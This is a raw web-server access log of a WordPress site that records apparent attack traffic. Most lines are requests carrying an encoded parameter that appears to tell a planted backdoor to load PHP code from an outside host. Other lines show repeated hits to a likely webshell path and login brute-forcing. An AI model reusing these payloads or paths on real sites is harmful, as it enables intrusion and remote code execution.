179.188.53.243 - - [17/Mar/2026:00:29:39 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313737392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383137392q3638396361383432393237396132343138383263613039386237653534396265222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
103.216.118.192 - - [17/Mar/2026:00:34:24 -0300] "GET /wp-login.php HTTP/1.1" 200 74371 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; wbx 1.0.0)"
162.215.11.230 - - [17/Mar/2026:00:34:28 -0300] "GET /wp-login.php HTTP/1.1" 200 74387 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
69.197.179.242 - - [17/Mar/2026:00:33:14 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
162.215.11.230 - - [17/Mar/2026:00:34:41 -0300] "POST /wp-login.php HTTP/1.1" 200 74371 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
103.216.118.192 - - [17/Mar/2026:00:34:41 -0300] "POST /wp-login.php HTTP/1.1" 200 74371 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; wbx 1.0.0)"
179.188.53.243 - - [17/Mar/2026:00:30:00 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313830302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383230302q6366633638653466393464663139366337386531346366336438336663353335222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:30:24 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313832342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383232342q3534623137376364353364373135303734323464643830373634643563313663222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:30:45 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313834352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383234352q6165353433633764356338383630386663393566393763313461613165373033222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:31:06 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313836362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383236362q3631656666616363346130653164396538353264353162396365626532336437222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [17/Mar/2026:00:34:45 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [17/Mar/2026:00:31:28 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313838382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383238382q3733393362613262383833343064373666313363353934663930323365383663222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:31:49 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313930392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383330392q3266326333656263663762366330323365363736336331363639336664653239222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:32:10 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313933302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383333302q6533356330306338616166643266613035373836303563386132366332346239222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:32:32 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313935322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383335322q6332346264623935323333356332623963353137333638643233633865336665222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [17/Mar/2026:00:36:18 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
167.71.234.233 167.71.234.233 - - [17/Mar/2026:00:37:44 -0300] "GET / HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
167.71.234.233 - - [17/Mar/2026:00:37:48 -0300] "GET / HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
179.188.53.243 - - [17/Mar/2026:00:32:54 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313937342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383337342q3731323334303630343163613437623037356362326361636263356665316631222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:33:15 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313939352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383339352q6135376436383363646436633036336637306235633439303964626637333030222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:33:36 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323031362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383431362q3834363136616134646365376337313431613761396237313739396166643862222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:33:58 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323033382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383433382q3736353431623736353038333636663062393264646132323633623137383461222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [17/Mar/2026:00:39:10 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [17/Mar/2026:00:34:20 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323036302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383436302q6638383130326437623232336231336235363632356338623863313131613938222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [17/Mar/2026:00:37:52 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [17/Mar/2026:00:34:41 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323038312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383438312q3266373934306432393961663831653166336434323165373735303439333734222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:35:02 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323130322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383530322q6465633936353364326536386334306466326432653730633465333539663431222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:35:23 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323132332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383532332q3966613438363566656162643136613435313065376134386562613233623963222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:35:45 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323134352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383534352q6666383763303266613262613532303566386137313834663830373236356462222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [17/Mar/2026:00:39:23 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [17/Mar/2026:00:36:07 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323136372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383536372q3138346230376666393032643730303761396333613431626138353435333337222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:36:28 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323138382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383538382q6335643037666236653465663134326466313366303764643266386361656532222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [17/Mar/2026:00:41:37 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [17/Mar/2026:00:36:49 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323230392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383630392q3839663662616464623633633665353166616265386438333734393331623936222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
157.22.45.179 - - [17/Mar/2026:00:41:39 -0300] "POST / HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
179.188.53.243 - - [17/Mar/2026:00:37:10 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323233302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383633302q3836376262326139653831313436346361663930636638343462383230343837222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [17/Mar/2026:00:40:54 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [17/Mar/2026:00:37:31 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323235312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383635312q3932356632316637376362613730383339323333613238333866326462326166222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:37:53 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323237332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383637332q3463393063613139343331373566613462663263323336303464643739613930222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:38:16 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323239362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383639362q6536366566376661383030613535343031346535313731373262366461626466222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:38:37 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732323331372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383731372q6530623833623132383730376461373232643365613565373136623533626664222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
